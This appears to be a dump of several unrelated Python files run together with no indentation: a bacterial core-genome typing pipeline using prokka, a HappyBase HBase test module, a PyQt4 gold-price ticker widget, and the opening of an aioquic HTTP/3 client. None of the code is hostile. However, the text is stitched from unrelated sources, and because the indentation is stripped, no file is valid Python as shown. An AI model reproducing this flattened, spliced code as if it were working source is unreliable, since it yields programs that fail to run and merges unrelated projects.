# Find all the unique profiles to use with a set
for sample in self.metadata.samples:
if sample[self.analysistype].profile != 'NA':
profileset.add(sample[self.analysistype].profile[0])
# Extract the profiles for each set
for sequenceprofile in profileset:
# Clear the list of genes
genelist = []
for sample in self.metadata.samples:
if sequenceprofile == sample[self.analysistype].profile[0]:
genelist = [os.path.split(x)[1].split('.')[0] for x in sample[self.analysistype].alleles]
try:
# Open the sequence profile file as a dictionary
profile = DictReader(open(sequenceprofile))
# Revert to standard comma separated values
except KeyError:
# Open the sequence profile file as a dictionary
profile = DictReader(open(sequenceprofile))
# Iterate through the rows
for row in profile:
# Iterate through the genes
for gene in genelist:
# Add the sequence profile, and type, the gene name and the allele number to the dictionary
try:
profiledata[sequenceprofile][row['ST']][gene] = row[gene]
except KeyError:
pass
# Add the gene list to a dictionary
genedict[sequenceprofile] = sorted(genelist)
# Add the profile data, and gene list to each sample
for sample in self.metadata.samples:
if sample.general.bestassemblyfile != 'NA':
if sequenceprofile == sample[self.analysistype].profile[0]:
# Populate the metadata with the profile data
sample[self.analysistype].profiledata = profiledata[sample[self.analysistype].profile[0]]
# Add the allele directory to a list of directories used in this analysis
self.allelefolders.add(sample[self.analysistype].alleledir)
dotter()
def annotatethreads(self):
"""
Use prokka to annotate each strain
"""
# Move the files to subfolders and create objects
self.runmetadata = createobject.ObjectCreation(self)
# Fix headers
self.headers()
printtime('Performing prokka analyses', self.start)
# Create and start threads
for i in range(self.cpus):
# Send the threads to the appropriate destination function
threads = Thread(target=self.annotate, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.metadata.samples:
# Create the prokka attribute in the metadata object
setattr(sample, 'prokka', GenObject())
sample.prokka.outputdir = os.path.join(sample.general.outputdirectory, 'prokka')
if not os.path.isdir(sample.prokka.outputdir):
os.makedirs(sample.prokka.outputdir)
# TODO Incorporate MASH/rMLST/user inputted genus, species results in the system call
# Create the system call
# prokka 2014-SEQ-0275.fasta --force --genus Escherichia --species coli --usegenus --addgenes
# --prefix 2014-SEQ-0275 --locustag EC0275 --outputdir /path/to/sequences/2014-SEQ-0275/prokka
sample.prokka.command = 'prokka {} ' \
'--force ' \
'--genus {} ' \
'--species {} ' \
'--usegenus ' \
'--addgenes ' \
'--prefix {} ' \
'--locustag {} ' \
'--outdir {}' \
.format(sample.general.fixedheaders,
self.genus, self.species, sample.name, sample.name, sample.prokka.outputdir)
self.queue.put(sample)
self.queue.join()
def annotate(self):
while True:
threadlock = Lock()
sample = self.queue.get()
sample.prokka.outputdir = os.path.abspath(sample.prokka.outputdir)
if not os.path.isfile(os.path.join(sample.prokka.outputdir, '{}.gff'.format(sample.name))):
# call(sample.prokka.command, shell=True, stdout=self.fnull, stderr=self.fnull)
out, err = run_subprocess(sample.prokka.command)
threadlock.acquire()
write_to_logfile(sample.prokka.command, sample.prokka.command, self.logfile)
write_to_logfile(out, err, self.logfile)
threadlock.release()
# List of the file extensions created with a prokka analysis
files = ['err', 'faa', 'ffn', 'fna', 'fsa', 'gbk', 'gff', 'log', 'sqn', 'tbl', 'txt']
# List of the files created for the sample by prokka
prokkafiles = glob(os.path.join(sample.prokka.outputdir, '*'))
# Find out which files have been created in the analysis
for extension in files:
# If the file was created, set the file path/name as the data for the attribute
if extension in [prokka.split('.')[1] for prokka in prokkafiles]:
for output in prokkafiles:
setattr(sample.prokka, output.split('.')[1], output)
# Otherwise, populate the attribute with 'NA'
else:
setattr(sample.prokka, extension, 'NA')
self.queue.task_done()
def headers(self):
"""
The contig ID must be twenty characters or fewer. The names of the headers created following SPAdes assembly
are usually far too long. This renames them as the sample name
"""
for sample in self.metadata.samples:
# Create an attribute to store the path/file name of the fasta file with fixed headers
sample.general.fixedheaders = sample.general.bestassemblyfile.replace('.fasta', '.ffn')
sample.general.fixedheaders = os.path.abspath(sample.general.fixedheaders)
# A list of contigs with modified record.id values
fixedheaders = list()
# Only do this if the file with fixed headers hasn't previously been created
if not os.path.isfile(sample.general.fixedheaders):
# Refseq genomes don't necessarily have underscores (or contig numbers) in the headers
count = 0
formatcount = '{:04d}'.format(count)
for record in SeqIO.parse(open(sample.general.bestassemblyfile, "rU"), "fasta"):
# Split off anything following the contig number
# >2013-SEQ-0129_1_length_303005_cov_13.1015_ID_17624 becomes
# >2013-SEQ-0129_1
record.id = record.id.split('_length')[0]
# Prokka has a requirement that the header is unique and less than or equal to 20 characters
if len(record.id) > 20:
# Extract the contig number from the string - assumption is that this number is the final
# entry in the string, and that there are underscore separating the different components
contignumber = record.id.split('_')[-1] if '_' in record.id else formatcount
# Subtract the length of the contig number (and an additional one for the underscore) from
# 20 for the string slice, and add the contig number at the end
record.id = record.id[:(20 - len(contignumber) - 1)] + '_{}'.format(formatcount)
# Clear the name and description attributes of the record
record.name = ''
record.description = ''
# Add this record to our list
fixedheaders.append(record)
# Open the filtered assembly file
with open(sample.general.fixedheaders, 'w') as formatted:
# Write the records in the list to the file
SeqIO.write(fixedheaders, formatted, 'fasta')
def cdsthreads(self):
"""
Determines which core genes from a pre-calculated database are present in each strain
"""
# Create and start threads
for i in range(self.cpus):
# Send the threads to the appropriate destination function
threads = Thread(target=self.cds, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.metadata.samples:
#
sample[self.analysistype].corepresence = dict()
self.cdsqueue.put(sample)
self.cdsqueue.join()
def cds(self):
while True:
sample = self.cdsqueue.get()
with open(sample.prokka.gff, 'r') as gff:
for feature in gff:
# Only interested in the sequence name if it is a CDS
if 'CDS' in feature:
# Extract the sequence name from the string. Example below
# 2013-SEQ-0123-2014_1 Prodigal:2.6 CDS 443 1741 . + 0
# ID=0279_00002;Parent=0279_00002_gene;gene=kgtP_1;
# inference=ab initio prediction:Prodigal:2.6,similar to AA sequence:UniProtKB:P0AEX3;
# locus_tag=0279_00002;product=Alpha-ketoglutarate permease
name = feature.split('ID=')[1].split(';')[0]
# Add number and names of genes to dictionaries
try:
gene = feature.split('gene=')[1].split(';')[0]
if gene in self.allelenames:
sample[self.analysistype].corepresence[name] = gene
except IndexError:
pass
self.cdsqueue.task_done()
def cdssequencethreads(self):
"""
Extracts the sequence of each gene for each strain
"""
# Create and start threads
for i in range(self.cpus):
# Send the threads to the appropriate destination function
threads = Thread(target=self.cdssequence, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.metadata.samples:
# Initialise a dictionary to store the sequence of each core gene
sample[self.analysistype].coresequence = dict()
self.sequencequeue.put(sample)
self.sequencequeue.join()
def cdssequence(self):
while True:
sample = self.sequencequeue.get()
for record in SeqIO.parse(open(sample.prokka.ffn, 'r'), 'fasta'):
# If the gene name is present in the list of core genes, add the sequence to the dictionary
if record.id in sample[self.analysistype].corepresence:
sample[self.analysistype].coresequence[record.id] = str(record.seq)
self.sequencequeue.task_done()
def allelematchthreads(self):
"""
Determine allele of each gene
"""
# Create and start threads
for i in range(self.cpus):
# Send the threads to the appropriate destination function
threads = Thread(target=self.allelematch, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.metadata.samples:
sample[self.analysistype].allelematches = dict()
self.allelequeue.put(sample)
self.allelequeue.join()
def allelematch(self):
while True:
sample = self.allelequeue.get()
# Iterate through all the core genes
for name, gene in sample[self.analysistype].corepresence.items():
# Iterate through all the alleles for the gene
for record in SeqIO.parse(open(self.alleledict[gene], 'r'), 'fasta'):
# If the current genes matches the database alleles
if str(record.seq) == sample[self.analysistype].coresequence[name]:
# Set the gene to the corresponding allele number
sample[self.analysistype].allelematches[gene] = record.id
self.allelequeue.task_done()
def sequencetyper(self):
"""
Determines the sequence type of each strain based on comparisons to sequence type profiles
"""
for sample in self.metadata.samples:
if sample.general.bestassemblyfile != 'NA':
if type(sample[self.analysistype].allelenames) == list:
#
if sample[self.analysistype].profile != 'NA':
# Initialise dictionaries
sample[self.analysistype].profilematches = dict()
sample[self.analysistype].sequencetypematches = dict()
# Create the profiledata variable to avoid writing self.profiledata[self.analysistype]
profiledata = sample[self.analysistype].profiledata
# For each gene
for gene in sorted(sample[self.analysistype].allelenames):
try:
allelenumber = sample[self.analysistype].allelematches[gene].split('-')[1]
# Find the profile with the most alleles in common with the query genome
for sequencetype in profiledata:
# refallele is the allele number of the sequence type
refallele = profiledata[sequencetype][gene]
if allelenumber == refallele:
# Add matching alleles
try:
sample[self.analysistype].profilematches[sequencetype] += 1
sample[self.analysistype].sequencetypematches[sequencetype].append(
refallele)
except KeyError:
sample[self.analysistype].profilematches[sequencetype] = 1
sample[self.analysistype].sequencetypematches[sequencetype] = list()
sample[self.analysistype].sequencetypematches[sequencetype].append(
refallele)
except KeyError:
pass
def reporter(self):
"""
Parse the results into a report
"""
# Initialise variables
header = ''
row = ''
databasedict = dict()
# Load the database sequence type into a dictionary
strainprofile = os.path.join(self.profilelocation, 'strainprofiles.txt')
databaseprofile = DictReader(open(strainprofile))
# Put the strain profile dictionary into a more easily searchable format
for data in databaseprofile:
databasedict[data['Strain']] = data['SequenceType']
for sample in self.metadata.samples:
closestmatches = list()
if sample[self.analysistype].reportdir != 'NA':
if type(sample[self.analysistype].allelenames) == list:
# Populate the header with the appropriate data, including all the genes in the list of targets
header = 'Strain,SequenceType,Matches,Mismatches,NA,TotalGenes,ClosestDatabaseMatch,{},\n' \
.format(','.join(sorted(sample[self.analysistype].allelenames)))
sortedmatches = sorted(sample[self.analysistype].profilematches.items(),
key=operator.itemgetter(1), reverse=True)[0]
closestseqtype = sortedmatches[0]
# Pull out the closest database match
for strain, seqtype in databasedict.items():
if seqtype == closestseqtype:
closestmatches.append(strain)
sample[self.analysistype].closestseqtype = closestseqtype
nummatches = int(sortedmatches[1])
numna = 0
queryallele = list()
# Get all the alleles into a list
for gene, allele in sorted(sample[self.analysistype].profiledata[closestseqtype].items()):
try:
# Extract the allele (anything after the -) from the allele matches
query = sample[self.analysistype].allelematches[gene].split('-')[1]
if allele == query:
queryallele.append(query)
else:
queryallele.append('{} ({})'.format(query, allele))
except KeyError:
queryallele.append('NA')
numna += 1
mismatches = len(sample[self.analysistype].alleles) - nummatches - numna
row += '{},{},{},{},{},{},{},{}'\
.format(sample.name, closestseqtype, nummatches, mismatches, numna,
len(sample[self.analysistype].alleles), ','.join(closestmatches), ','.join(queryallele))
row += '\n'
# Create the report folder
make_path(self.reportpath)
# Create the report containing all the data from all samples
with open(os.path.join(self.reportpath, '{}.csv'.format(self.analysistype)), 'w') as combinedreport:
# Write the results to this report
combinedreport.write(header)
combinedreport.write(row)
def __init__(self, inputobject):
self.path = inputobject.path
self.sequencepath = inputobject.sequencepath
self.start = inputobject.start
self.cpus = inputobject.cpus
self.genus = inputobject.genus
self.species = inputobject.species
self.dockerimage = inputobject.dockerimage
self.pipeline = inputobject.pipeline
if not self.pipeline:
self.metadata = MetadataObject()
else:
self.metadata = MetadataObject()
self.metadata.samples = inputobject.metadata
# Folders
try:
self.coregenelocation = inputobject.coregenelocation
except AttributeError:
self.coregenelocation = os.path.join(self.path, 'coregenes', self.genus)
try:
self.profilelocation = inputobject.profilelocation
except AttributeError:
self.profilelocation = os.path.join(self.path, 'profile', self.genus)
self.reportpath = os.path.join(self.path, 'reports')
# Class variables
self.genes = sorted(glob(os.path.join(self.coregenelocation, '*.fasta')))
self.profile = glob(os.path.join(self.profilelocation, '*.txt'))
self.analysistype = 'core'
self.allelenames = sorted([os.path.basename(x).split('.')[0] for x in self.genes])
self.alleledict = dict(zip(self.allelenames, self.genes))
self.allelefolders = set()
self.queue = Queue()
self.dqueue = Queue()
self.cdsqueue = Queue()
self.sequencequeue = Queue()
self.allelequeue = Queue()
self.logfile = inputobject.logfile
self.resultprofile = defaultdict(make_dict)
# Perform typing
self.handler()
# Remove the attributes from the object; they take up too much room on the .json report
for sample in self.metadata.samples:
try:
delattr(sample[self.analysistype], "allelenames")
delattr(sample[self.analysistype], "alleles")
delattr(sample[self.analysistype], "profiledata")
except KeyError:
pass
self.runmetadata = self.metadata
# Print the metadata to file
metadataprinter.MetadataPrinter(self)
|
test_api.py | """
HappyBase tests.
"""
import collections
import os
import random
import threading
from nose.tools import (
assert_dict_equal,
assert_equal,
assert_false,
assert_in,
assert_is_instance,
assert_is_not_none,
assert_list_equal,
assert_not_in,
assert_raises,
assert_true,
)
from happybase import Connection, ConnectionPool, NoConnectionsAvailable
HAPPYBASE_HOST = os.environ.get('HAPPYBASE_HOST')
HAPPYBASE_PORT = os.environ.get('HAPPYBASE_PORT')
HAPPYBASE_COMPAT = os.environ.get('HAPPYBASE_COMPAT', '0.96')
HAPPYBASE_TRANSPORT = os.environ.get('HAPPYBASE_TRANSPORT', 'buffered')
KEEP_TABLE = ('HAPPYBASE_NO_CLEANUP' in os.environ)
TABLE_PREFIX = 'happybase_tests_tmp'
TEST_TABLE_NAME = 'test1'
connection_kwargs = dict(
host=HAPPYBASE_HOST,
port=HAPPYBASE_PORT,
table_prefix=TABLE_PREFIX,
compat=HAPPYBASE_COMPAT,
transport=HAPPYBASE_TRANSPORT,
)
# Yuck, globals
connection = table = None
def maybe_delete_table():
if KEEP_TABLE:
return
if TEST_TABLE_NAME in connection.tables():
print "Test table already exists; removing it..."
connection.delete_table(TEST_TABLE_NAME, disable=True)
def setup_module():
global connection, table
connection = Connection(**connection_kwargs)
assert_is_not_none(connection)
maybe_delete_table()
cfs = {
'cf1': {},
'cf2': None,
'cf3': {'max_versions': 1},
}
connection.create_table(TEST_TABLE_NAME, families=cfs)
table = connection.table(TEST_TABLE_NAME)
assert_is_not_none(table)
def teardown_module():
if not KEEP_TABLE:
connection.delete_table(TEST_TABLE_NAME, disable=True)
connection.close()
def test_connection_compat():
with assert_raises(ValueError):
Connection(compat='0.1.invalid.version')
def test_timeout_arg():
Connection(
timeout=5000,
autoconnect=False)
def test_enabling():
assert_true(connection.is_table_enabled(TEST_TABLE_NAME))
connection.disable_table(TEST_TABLE_NAME)
assert_false(connection.is_table_enabled(TEST_TABLE_NAME))
connection.enable_table(TEST_TABLE_NAME)
assert_true(connection.is_table_enabled(TEST_TABLE_NAME))
def test_compaction():
connection.compact_table(TEST_TABLE_NAME)
connection.compact_table(TEST_TABLE_NAME, major=True)
def test_prefix():
assert_equal(TABLE_PREFIX + '_', connection._table_name(''))
assert_equal(TABLE_PREFIX + '_foo', connection._table_name('foo'))
assert_equal(connection.table('foobar').name, TABLE_PREFIX + '_foobar')
assert_equal(connection.table('foobar', use_prefix=False).name, 'foobar')
c = Connection(autoconnect=False)
assert_equal('foo', c._table_name('foo'))
with assert_raises(TypeError):
Connection(autoconnect=False, table_prefix=123)
with assert_raises(TypeError):
Connection(autoconnect=False, table_prefix_separator=2.1)
def test_stringify():
str(connection)
repr(connection)
str(table)
repr(table)
def test_table_listing():
names = connection.tables()
assert_is_instance(names, list)
assert_in(TEST_TABLE_NAME, names)
def test_table_regions():
regions = table.regions()
assert_is_instance(regions, list)
def test_invalid_table_create():
with assert_raises(ValueError):
connection.create_table('sometable', families={})
with assert_raises(TypeError):
connection.create_table('sometable', families=0)
with assert_raises(TypeError):
connection.create_table('sometable', families=[])
def test_families():
families = table.families()
for name, fdesc in families.iteritems():
assert_is_instance(name, basestring)
assert_is_instance(fdesc, dict)
assert_in('name', fdesc)
assert_in('max_versions', fdesc)
def test_put():
table.put('r1', {'cf1:c1': 'v1', 'cf1:c2': 'v2', 'cf2:c3': 'v3'})
table.put('r1', {'cf1:c4': 'v2'}, timestamp=2345678)
table.put('r1', {'cf1:c4': 'v2'}, timestamp=1369168852994L)
def test_atomic_counters():
row = 'row-with-counter'
column = 'cf1:counter'
assert_equal(0, table.counter_get(row, column))
assert_equal(10, table.counter_inc(row, column, 10))
assert_equal(10, table.counter_get(row, column))
table.counter_set(row, column, 0)
assert_equal(1, table.counter_inc(row, column))
assert_equal(4, table.counter_inc(row, column, 3))
assert_equal(4, table.counter_get(row, column))
table.counter_set(row, column, 3)
assert_equal(3, table.counter_get(row, column))
assert_equal(8, table.counter_inc(row, column, 5))
assert_equal(6, table.counter_inc(row, column, -2))
assert_equal(5, table.counter_dec(row, column))
assert_equal(3, table.counter_dec(row, column, 2))
assert_equal(10, table.counter_dec(row, column, -7))
def test_batch():
with assert_raises(TypeError):
table.batch(timestamp='invalid')
b = table.batch()
b.put('row1', {'cf1:col1': 'value1',
'cf1:col2': 'value2'})
b.put('row2', {'cf1:col1': 'value1',
'cf1:col2': 'value2',
'cf1:col3': 'value3'})
b.delete('row1', ['cf1:col4'])
b.delete('another-row')
b.send()
b = table.batch(timestamp=1234567)
b.put('row1', {'cf1:col5': 'value5'})
b.send()
with assert_raises(ValueError):
b = table.batch(batch_size=0)
with assert_raises(TypeError):
b = table.batch(transaction=True, batch_size=10)
def test_batch_context_managers():
with table.batch() as b:
b.put('row4', {'cf1:col3': 'value3'})
b.put('row5', {'cf1:col4': 'value4'})
b.put('row', {'cf1:col1': 'value1'})
b.delete('row', ['cf1:col4'])
b.put('row', {'cf1:col2': 'value2'})
with table.batch(timestamp=87654321) as b:
b.put('row', {'cf1:c3': 'somevalue',
'cf1:c5': 'anothervalue'})
b.delete('row', ['cf1:c3'])
with assert_raises(ValueError):
with table.batch(transaction=True) as b:
b.put('fooz', {'cf1:bar': 'baz'})
raise ValueError
assert_dict_equal({}, table.row('fooz', ['cf1:bar']))
with assert_raises(ValueError):
with table.batch(transaction=False) as b:
b.put('fooz', {'cf1:bar': 'baz'})
raise ValueError
assert_dict_equal({'cf1:bar': 'baz'}, table.row('fooz', ['cf1:bar']))
with table.batch(batch_size=5) as b:
for i in xrange(10):
b.put('row-batch1-%03d' % i, {'cf1:': str(i)})
with table.batch(batch_size=20) as b:
for i in xrange(95):
b.put('row-batch2-%03d' % i, {'cf1:': str(i)})
assert_equal(95, len(list(table.scan(row_prefix='row-batch2-'))))
with table.batch(batch_size=20) as b:
for i in xrange(95):
b.delete('row-batch2-%03d' % i)
assert_equal(0, len(list(table.scan(row_prefix='row-batch2-'))))
def test_row():
row = table.row
put = table.put
row_key = 'row-test'
with assert_raises(TypeError):
row(row_key, 123)
with assert_raises(TypeError):
row(row_key, timestamp='invalid')
put(row_key, {'cf1:col1': 'v1old'}, timestamp=1234)
put(row_key, {'cf1:col1': 'v1new'}, timestamp=3456)
put(row_key, {'cf1:col2': 'v2',
'cf2:col1': 'v3'})
put(row_key, {'cf2:col2': 'v4'}, timestamp=1234)
exp = {'cf1:col1': 'v1new',
'cf1:col2': 'v2',
'cf2:col1': 'v3',
'cf2:col2': 'v4'}
assert_dict_equal(exp, row(row_key))
exp = {'cf1:col1': 'v1new',
'cf1:col2': 'v2'}
assert_dict_equal(exp, row(row_key, ['cf1']))
exp = {'cf1:col1': 'v1new',
'cf2:col2': 'v4'}
assert_dict_equal(exp, row(row_key, ['cf1:col1', 'cf2:col2']))
exp = {'cf1:col1': 'v1old',
'cf2:col2': 'v4'}
assert_dict_equal(exp, row(row_key, timestamp=2345))
assert_dict_equal({}, row(row_key, timestamp=123))
res = row(row_key, include_timestamp=True)
assert_equal(len(res), 4)
assert_equal('v1new', res['cf1:col1'][0])
assert_is_instance(res['cf1:col1'][1], int)
def test_rows():
row_keys = ['rows-row1', 'rows-row2', 'rows-row3']
data_old = {'cf1:col1': 'v1old', 'cf1:col2': 'v2old'}
data_new = {'cf1:col1': 'v1new', 'cf1:col2': 'v2new'}
with assert_raises(TypeError):
table.rows(row_keys, object())
with assert_raises(TypeError):
table.rows(row_keys, timestamp='invalid')
for row_key in row_keys:
table.put(row_key, data_old, timestamp=4000)
for row_key in row_keys:
table.put(row_key, data_new)
assert_dict_equal({}, table.rows([]))
rows = dict(table.rows(row_keys))
for row_key in row_keys:
assert_in(row_key, rows)
assert_dict_equal(data_new, rows[row_key])
rows = dict(table.rows(row_keys, timestamp=5000))
for row_key in row_keys:
assert_in(row_key, rows)
assert_dict_equal(data_old, rows[row_key])
def test_cells():
row_key = 'cell-test'
col = 'cf1:col1'
table.put(row_key, {col: 'old'}, timestamp=1234)
table.put(row_key, {col: 'new'})
with assert_raises(TypeError):
table.cells(row_key, col, versions='invalid')
with assert_raises(TypeError):
table.cells(row_key, col, versions=3, timestamp='invalid')
with assert_raises(ValueError):
table.cells(row_key, col, versions=0)
results = table.cells(row_key, col, versions=1)
assert_equal(len(results), 1)
assert_equal('new', results[0])
results = table.cells(row_key, col)
assert_equal(len(results), 2)
assert_equal('new', results[0])
assert_equal('old', results[1])
results = table.cells(row_key, col, timestamp=2345, include_timestamp=True)
assert_equal(len(results), 1)
assert_equal('old', results[0][0])
assert_equal(1234, results[0][1])
def test_scan():
with assert_raises(TypeError):
list(table.scan(row_prefix='foobar', row_start='xyz'))
with assert_raises(ValueError):
list(table.scan(batch_size=None))
if connection.compat == '0.90':
with assert_raises(NotImplementedError):
list(table.scan(filter='foo'))
with assert_raises(ValueError):
list(table.scan(limit=0))
with assert_raises(TypeError):
list(table.scan(row_start='foobar', row_prefix='foo'))
with table.batch() as b:
for i in range(2000):
b.put('row-scan-a%05d' % i,
{'cf1:col1': 'v1',
'cf1:col2': 'v2',
'cf2:col1': 'v1',
'cf2:col2': 'v2'})
b.put('row-scan-b%05d' % i,
{'cf1:col1': 'v1',
'cf1:col2': 'v2'})
def calc_len(scanner):
d = collections.deque(maxlen=1)
d.extend(enumerate(scanner, 1))
if d:
return d[0][0]
return 0
scanner = table.scan(row_start='row-scan-a00012',
row_stop='row-scan-a00022')
assert_equal(10, calc_len(scanner))
scanner = table.scan(row_start='xyz')
assert_equal(0, calc_len(scanner))
scanner = table.scan(row_start='xyz', row_stop='zyx')
assert_equal(0, calc_len(scanner))
scanner = table.scan(row_start='row-scan-', row_stop='row-scan-a999',
columns=['cf1:col1', 'cf2:col2'])
row_key, row = next(scanner)
assert_equal(row_key, 'row-scan-a00000')
assert_dict_equal(row, {'cf1:col1': 'v1',
'cf2:col2': 'v2'})
assert_equal(2000 - 1, calc_len(scanner))
scanner = table.scan(row_prefix='row-scan-a', batch_size=499, limit=1000)
assert_equal(1000, calc_len(scanner))
scanner = table.scan(row_prefix='row-scan-b', batch_size=1, limit=10)
assert_equal(10, calc_len(scanner))
scanner = table.scan(row_prefix='row-scan-b', batch_size=5, limit=10)
assert_equal(10, calc_len(scanner))
scanner = table.scan(timestamp=123)
assert_equal(0, calc_len(scanner))
scanner = table.scan(row_prefix='row', timestamp=123)
assert_equal(0, calc_len(scanner))
scanner = table.scan(batch_size=20)
next(scanner)
next(scanner)
scanner.close()
with assert_raises(StopIteration):
next(scanner)
def test_scan_sorting():
if connection.compat < '0.96':
return # not supported
input_row = {}
for i in xrange(100):
input_row['cf1:col-%03d' % i] = ''
input_key = 'row-scan-sorted'
table.put(input_key, input_row)
scan = table.scan(row_start=input_key, sorted_columns=True)
key, row = next(scan)
assert_equal(key, input_key)
assert_list_equal(
sorted(input_row.items()),
row.items())
def test_scan_filter_and_batch_size():
# See issue #54 and #56
filter = "SingleColumnValueFilter ('cf1', 'qual1', =, 'binary:val1')"
for k, v in table.scan(filter=filter):
print v
def test_delete():
row_key = 'row-test-delete'
data = {'cf1:col1': 'v1',
'cf1:col2': 'v2',
'cf1:col3': 'v3'}
table.put(row_key, {'cf1:col2': 'v2old'}, timestamp=1234)
table.put(row_key, data)
table.delete(row_key, ['cf1:col2'], timestamp=2345)
assert_equal(1, len(table.cells(row_key, 'cf1:col2', versions=2)))
assert_dict_equal(data, table.row(row_key))
table.delete(row_key, ['cf1:col1'])
res = table.row(row_key)
assert_not_in('cf1:col1', res)
assert_in('cf1:col2', res)
assert_in('cf1:col3', res)
table.delete(row_key, timestamp=12345)
res = table.row(row_key)
assert_in('cf1:col2', res)
assert_in('cf1:col3', res)
table.delete(row_key)
assert_dict_equal({}, table.row(row_key))
def test_connection_pool_construction():
with assert_raises(TypeError):
ConnectionPool(size='abc')
with assert_raises(ValueError):
ConnectionPool(size=0)
def test_connection_pool():
from thrift.transport.TTransport import TTransportException
def run():
name = threading.current_thread().name
print "Thread %s starting" % name
def inner_function():
# Nested connection requests must return the same connection
with pool.connection() as another_connection:
assert connection is another_connection
# Fake an exception once in a while
if random.random() < .25:
print "Introducing random failure"
connection.transport.close()
raise TTransportException("Fake transport exception")
for i in xrange(50):
with pool.connection() as connection:
connection.tables()
try:
inner_function()
except TTransportException:
# This error should have been picked up by the
# connection pool, and the connection should have
# been replaced by a fresh one
pass
connection.tables()
print "Thread %s done" % name
N_THREADS = 10
pool = ConnectionPool(size=3, **connection_kwargs)
threads = [threading.Thread(target=run) for i in xrange(N_THREADS)]
for t in threads:
t.start()
while threads:
for t in threads:
t.join(timeout=.1)
# filter out finished threads
threads = [t for t in threads if t.is_alive()]
print "%d threads still alive" % len(threads)
def test_pool_exhaustion():
pool = ConnectionPool(size=1, **connection_kwargs)
def run():
with assert_raises(NoConnectionsAvailable):
with pool.connection(timeout=.1) as connection:
connection.tables()
with pool.connection():
# At this point the only connection is assigned to this thread,
# so another thread cannot obtain a connection at this point.
t = threading.Thread(target=run)
t.start()
t.join()
if __name__ == '__main__':
import logging
import sys
# Dump stacktraces using 'kill -USR1', useful for debugging hanging
# programs and multi threading issues.
try:
import faulthandler
except ImportError:
pass
else:
import signal
faulthandler.register(signal.SIGUSR1)
logging.basicConfig(level=logging.DEBUG)
method_name = 'test_%s' % sys.argv[1]
method = globals()[method_name]
method()
|
goldticker.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import csv
import sys, traceback
import threading
import time
import urllib2
from PyQt4 import QtGui,QtCore
from boardlet import Boardlet
from modellet import Modellet
class GoldTicker(Boardlet):
def __init__(self, parent):
super(GoldTicker, self).__init__(parent)
self.p_model = GoldRate()
self.fubar()
def fubar(self):
super(GoldTicker, self).initUI()
self.p_icon = QtGui.QLabel(self)
self.p_icon.setGeometry( self.b_imgx(), self.b_imgy(),
self.b_iconwidth(),self.b_iconheight() )
self.p_icon.setPixmap( QtGui.QPixmap(os.getcwd() + '/img/gold.png' ) )
t = threading.Thread(target=self.periodicUpdate)
t.setDaemon(True)
t.start()
def paintEvent(self, e):
super(GoldTicker, self).paintEvent(e)
if None == self.p_model.getData():
return
try:
source = QtGui.QImage()
source.loadFromData( self.p_model.getData() )
source = source.copy( 0,0, source.width(), 100 )
# substitute 'black' pixels with transparent
dest = QtGui.QImage( source.width(), source.height(),
QtGui.QImage.Format_ARGB32 )
qp = QtGui.QPainter()
qp.begin( dest )
for col in xrange(0, source.width()):
for row in xrange(0, source.height()):
pel = QtGui.QColor( source.pixel(col, row) )
if pel.red() < 10 and pel.green() < 10 and pel.blue() < 10:
dest.setPixel( col, row, QtGui.qRgba(0,0,0,0) )
else:
dest.setPixel( col, row, pel.rgba() )
qp.end()
# draw on screen
qp = QtGui.QPainter()
qp.begin(self)
qp.drawImage( self.b_col1x(), self.b_imgy(), dest )
qp.end()
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
print ''.join('!! ' + line for line in lines)
def periodicUpdate(self):
while(True):
st = self.getNextWaitTimeSeconds()
self.p_model.doRefresh()
time.sleep( st )
class GoldRate(Modellet):
def __init__(self):
super(GoldRate, self).__init__()
self.p_imgdata = None
def getData(self):
return self.p_imgdata
def doRefresh(self):
url = 'http://www.kitconet.com/images/quotes_special.gif'
try:
self.p_imgdata = urllib2.urlopen(url).read()
super(GoldRate, self).setFaultFlag(False)
super(GoldRate, self).setLastUpdatedNow()
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
print ''.join('!! ' + line for line in lines)
super(GoldRate, self).setFaultFlag(True)
|
client_1_(asynchronous).py | import argparse
import asyncio
import json
import logging
import pickle
import ssl
import sys
from sys import stdin
import time
import os
from collections import deque
from typing import Callable, Deque, Dict, List, Optional, Union, cast
from urllib.parse import urlparse
from threading import Thread
import PySimpleGUI as sg
import time
import wsproto
import wsproto.events
import aioquic
from aioquic.asyncio.client import connect
from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.h0.connection import H0_ALPN, H0Connection
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.h3.events import (
DataReceived,
H3Event,
HeadersReceived,
PushPromiseReceived,
)
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.events import QuicEvent
from aioquic.quic.logger import QuicLogger
# main test params: --ca-certs ../Keys/pycacert.pem https://localhost:4433/
# outside server test params: --print-response https://cloudflare-quic.com/
# opening a websocket: --print-response --ca-certs Keys/pycacert.pem wss://localhost:4433/ws
try:
import uvloop
except ImportError:
uvloop = None
logger = logging.getLogger("client")
HttpConnection = Union[H0Connection, H3Connection]
USER_AGENT = "aioquic/" + aioquic.__version__
class URL:
def __init__(self, url: str):
parsed = urlparse(url)
self.authority = parsed.netloc
self.full_path = parsed.path
if parsed.query:
self.full_path += "?" + parsed.query
self.scheme = parsed.scheme
class HttpRequest:
def __init__(
self, method: str, url: URL, content: bytes = b"", headers: Dict = {}
) -> None:
self.content = content
self.headers = headers
self.method = method
self.url = url
class WebSocket:
def __init__(
self, http: HttpConnection, stream_id: int, transmit: Callable[[], None]
) -> None:
self.http = http
self.queue: asyncio.Queue[str] = asyncio.Queue()
self.stream_id = stream_id
self.subprotocol: Optional[str] = None
self.transmit = transmit
self.websocket = wsproto.Connection(wsproto.ConnectionType.CLIENT)
async def close(self, code=1000, reason="") -> None:
"""
Perform the closing handshake.
"""
data = self.websocket.send(
wsproto.events.CloseConnection(code=code, reason=reason)
)
self.http.send_data(stream_id=self.stream_id, data=data, end_stream=True)
self.transmit()
async def recv(self) -> str:
"""
Receive the next message.
"""
return await self.queue.get()
